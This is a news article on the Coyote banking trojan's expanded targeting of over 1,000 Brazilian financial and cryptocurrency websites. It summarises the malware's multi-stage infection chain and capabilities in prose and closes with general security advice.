TeamHood 
In a concerning development, cybersecurity experts have identified a significant expansion in the operations of the Coyote banking malware. The malware now targets over 1,000 websites and 73 financial institutions, primarily affecting Brazilian Windows users. This escalation underscores the evolving tactics of cybercriminals and the increasing sophistication of malware threats.
Evolution of Coyote Malware
Initially documented by Kaspersky in early 2024, Coyote was recognized for its capability to harvest sensitive information from more than 70 financial applications. The initial attack vector involved a Squirrel installer executable that triggered a Node.js application compiled with Electron, which subsequently ran a Nim-based loader to execute the malicious Coyote payload.
Recent analyses by Fortinet’s FortiGuard Labs have revealed a shift in Coyote’s infection methodology. The latest campaigns commence with a Windows Shortcut (LNK) file that executes a PowerShell command to retrieve a subsequent payload from a remote server. This payload is another PowerShell script that launches a loader responsible for executing an interim payload. The injected code leverages Donut, a tool designed to decrypt and execute the final Microsoft Intermediate Language (MSIL) payloads. The decrypted MSIL file establishes persistence by modifying the Windows registry, ensuring the malware’s continued presence on the infected system.
Expanded Target List
One of the most alarming developments is the significant expansion of Coyote’s target list. The malware now encompasses 1,030 websites and 73 financial agents, including prominent platforms such as mercadobitcoin.com.br, bitcointrade.com.br, and foxbit.com.br. This broadened scope indicates the attackers’ intent to cast a wider net, increasing the potential impact on unsuspecting users.
Malicious Capabilities
Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials. The malware gathers basic system information and the list of installed antivirus products on the host, encoding this data in Base64 and exfiltrating it to a remote server. It also performs various checks to evade detection by sandboxes and virtual environments.
If a victim attempts to access any of the targeted sites, the malware communicates with an attacker-controlled server to determine the next course of action. This can range from capturing a screenshot to serving overlays, activating a keylogger, and manipulating display settings.
Implications and Recommendations
The complex and multi-staged infection process of Coyote poses a significant threat to financial cybersecurity. The use of LNK files for initial access, followed by the deployment of various malicious files, highlights the sophisticated tactics employed by cybercriminals.
Given the potential for Coyote to expand beyond its initial targets, it is imperative for individuals and organizations to implement robust cybersecurity measures. This includes regularly updating software and systems, employing comprehensive security solutions, and educating users about the risks associated with opening unsolicited files or clicking on suspicious links.
Conclusion
As cyber threats continue to evolve, staying informed and vigilant is crucial in safeguarding sensitive information and maintaining the integrity of financial systems. The Coyote malware’s rapid evolution and expanding target list serve as a stark reminder of the persistent and adaptive nature of cyber threats.
